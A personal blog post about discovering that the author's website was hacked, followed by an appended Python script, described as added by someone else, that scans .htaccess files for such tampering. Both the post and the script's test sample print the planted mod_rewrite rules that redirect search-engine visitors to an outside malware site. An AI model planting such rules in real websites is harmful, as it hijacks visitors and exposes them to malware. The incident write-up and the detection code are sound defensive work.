this website hacked
the journal of Michael Werneburg
twenty-seven years and one million words
Today I learned from a friend that my website has been altered by someone redirecting search engine traffic to a spam website.
Not good news for someone who's spent fifteen years in the IT industry, and a good part of that tinkering with web servers and the code therein. Much shame upon me.
And upon my ISP, I have to say. Until proven otherwise, I'm now suspicious of their password management system, the security of the FTP server used in placing a bad file on my website, and their inability to proactively detect this sort of thing.
Here's what happened. First, I'd noticed over the past few months that using Google at the office to dig up a page on my website always led to a spam website that hosts "malware" (software of bad intent). I was unable to reproduce the issue from home. I put this down to the sometimes haywire proxy server at the office, which I've seen behaving badly in other ways.
Then a friend told me that the problem was persisting both at home and from his office. He did a bit of looking around on the 'net and discovered that the symptoms he was seeing were the result of a modification that had been made to various other websites as well. In fact, details of the issue and steps toward fixing it had been posted by these fine people.
The root of the problem was that the .htaccess file (which controls access to the website) had been altered. Instead of being a blank or very simple file, it had the following content. I apologize for the crude nature of the content; you may want to ensure that any children leave the browser's vicinity.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://vemo.info/0/go.php?sid=1 [R,L]
Naturally I replaced this with an empty file immediately and set the permissions to world-readable, world-unwritable. I then queried my ISP on how this had happened. I await their response with some misgivings. I'm still digging around to see if anything else was modified.
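For anyone doing the same digging, here is a small checker I've added as an illustration (it is not the post author's code, and nothing like it appears on the original page). It parses an .htaccess file and flags exactly the pattern quoted above: a run of RewriteCond lines testing %{HTTP_REFERER}, followed by a RewriteRule whose target is an absolute URL on some other host. The two sample files and the OWN_HOSTS set (www.example.com) are constructed for the example; point scan_tree at a real web root to check every .htaccess underneath it.

```python
"""Scan .htaccess files for referer-conditional redirects to foreign hosts.

Added example, not the post author's code. It detects the pattern quoted in
the post: RewriteCond lines testing %{HTTP_REFERER} for search-engine names,
followed by a RewriteRule sending the visitor to another site. OWN_HOSTS and
both sample texts are constructed for illustration.
"""
import re
import sys
from pathlib import Path

# Constructed sample: the malicious rules quoted in the post, with CRLF line
# endings on two lines as the altered file had.
MALICIOUS_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]\r\n"
    "RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]\r\n"
    "RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]\n"
    "RewriteRule .* http://vemo.info/0/go.php?sid=1 [R,L]\n"
)

# Constructed benign sample: an ordinary same-site redirect and an HTTPS
# upgrade. Neither tests the referer, so neither should be flagged.
BENIGN_HTACCESS = (
    "RewriteEngine On\n"
    "RewriteRule ^old/(.*)$ /new/$1 [R=301,L]\n"
    "RewriteCond %{HTTPS} off\n"
    "RewriteRule .* https://www.example.com%{REQUEST_URI} [R=301,L]\n"
)

OWN_HOSTS = {"www.example.com", "example.com"}  # assumed: the site's own hostnames

ABS_URL = re.compile(r"^https?://([^/?#]+)", re.I)


def find_referer_redirects(text, own_hosts=OWN_HOSTS):
    """Return one finding per RewriteRule that is (a) guarded by at least one
    RewriteCond on %{HTTP_REFERER} and (b) targets an absolute URL on a host not
    in own_hosts. mod_rewrite treats an absolute URL on a foreign host as an
    external redirect even without the [R] flag, so the flag is reported but
    not required for a match."""
    findings = []
    pending = []  # RewriteCond lines waiting for the RewriteRule they guard
    for lineno, raw in enumerate(text.splitlines(), 1):  # splitlines eats \r\n
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append((lineno, parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            flags = parts[3].strip("[]").split(",") if len(parts) > 3 else []
            referer_conds = [c for c in pending if "HTTP_REFERER" in c[1].upper()]
            m = ABS_URL.match(target)
            host = m.group(1).lower() if m else None
            if referer_conds and host and host not in own_hosts:
                findings.append({
                    "line": lineno,
                    "target_host": host,
                    "referer_patterns": [c[2] for c in referer_conds],
                    "explicit_redirect": any(
                        f.upper() == "R" or f.upper().startswith("R=") for f in flags
                    ),
                })
            pending = []  # conditions apply only to the rule that follows them
    return findings


def scan_tree(root, own_hosts=OWN_HOSTS):
    """Walk a web root and return {path: findings} for every .htaccess that
    carries a referer-conditional redirect to a foreign host."""
    report = {}
    for path in Path(root).rglob(".htaccess"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        hits = find_referer_redirects(text, own_hosts)
        if hits:
            report[str(path)] = hits
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            for h in hits:
                print(f"{path}:{h['line']} sends referer-matched visitors to "
                      f"{h['target_host']} (patterns: {', '.join(h['referer_patterns'])})")
    else:
        print(find_referer_redirects(MALICIOUS_HTACCESS))
        print(find_referer_redirects(BENIGN_HTACCESS))
```

Two caveats worth keeping in mind: the script only reads the rules, it does not prove the redirect fires, so confirm by requesting a page with a Referer header naming a search engine and watching for a 302; and an attacker who has write access to .htaccess may have touched other files too, so treat a hit as the start of a wider search rather than the end of one.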